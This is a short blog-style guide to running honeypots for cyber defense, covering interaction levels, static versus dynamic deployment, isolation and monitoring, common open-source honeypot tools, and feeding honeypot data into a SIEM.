Guide to Running Effective Honeypots
Taking cyber defense to the next level
A honeypot is a fake system intended to lure hackers away from the real network and keep them busy. It is also a way to analyze the intruder’s behaviors and techniques and enrich the defensive systems.
Using honeypots is a testament to the organization’s maturity and and shows that it has reached a high level of technicality and is ready for proactive cyber defense.
Why do we need a honeypot
In fact, we don’t. If you manage your security risks effectively and implement the right controls, you don’t need a honeypot. However, having a honeypot doesn’t replace security defenses and monitoring. I encourage you to at least discuss the idea internally to see your organization’s readiness to use these tools. Engaging in such a project is both fun and promising.
A dynamic honeypot
The level of interaction that can happen with the honeypot is what makes a difference. Not all honeypots are equat. To start, you can use what’s known as a “low interaction” honeypot, that is one that just simulates services or processes. it is easy to deploy and monitor.
And then there is the “high interaction” honeypot. This type of honeypots mimics the whole operating system, making it more likely to be regarded as real.
Both of the above types of honeypots can be static or dynamic. In most scenarios, a static honey is what is used; you build it and you leave it do its job. It also stays as it is for a while, maybe for weeks or months. On the other hand, a dynamic honeypot is stood up to reflect a certain threat or vulnerability that we want to monitor. This way, the environment stays dynamic and the tool is used for a very specific purpose and then replaced by another one. Of course, this is all automated. We have CI/CD and AI tools that can help with this kind of deployments.
Tools and techniques for deploying honeypots
Upon considering the best place to deploy a honeypot, most people choose the DMZ, because they feel it’s the most exposed to external connections. But this must not limit you. In fact, you can put honeypots wherever you want, given that it’s a place you want to keep under your watch.
As for the techniques, there are some general principles to keep in mind:
- Ensure that your system is fully isolated. Make sure that in case the honeypot is compromised, no lateral movement can happen.
- Consider easy redeployment using virtualized servers.
- Closely and continuously monitor the honeypot. Look for network connections to and from the honeypot and notice unusual spikes. Collect and analyze logs that are generated by the system, including authentication attempts, commands, and executables. Feed the data to your threat intelligence system to identify correlations.
Here are some popular tools to use to deploy honeypots along with their type:
T-Pot: High interaction
OpenCanary: Low interaction
Cowrie: High interaction
Honeyd: Low interaction
The Awesome honeypots Github project provides more honeypot ideas and resources.
Connecting with your cybersecurity ecosystem
Now that you have launched the honeypot, it’s time to use the data to enrich your information security strategies. I recommend that you integrate the honeypot with your Security Information and Event Manager (SIEM) to feed in content to be used to detect attacks. For example, if the organization is targeted by a threat actor, you can detect the IP used to break into the honeypot and correlate it across the network’s data. You can then detect their intrusion attempts into production systems. Furthermore, you can feed the honeypot data to intelligence management systems and identify the hacker profiles that are targeting your organization.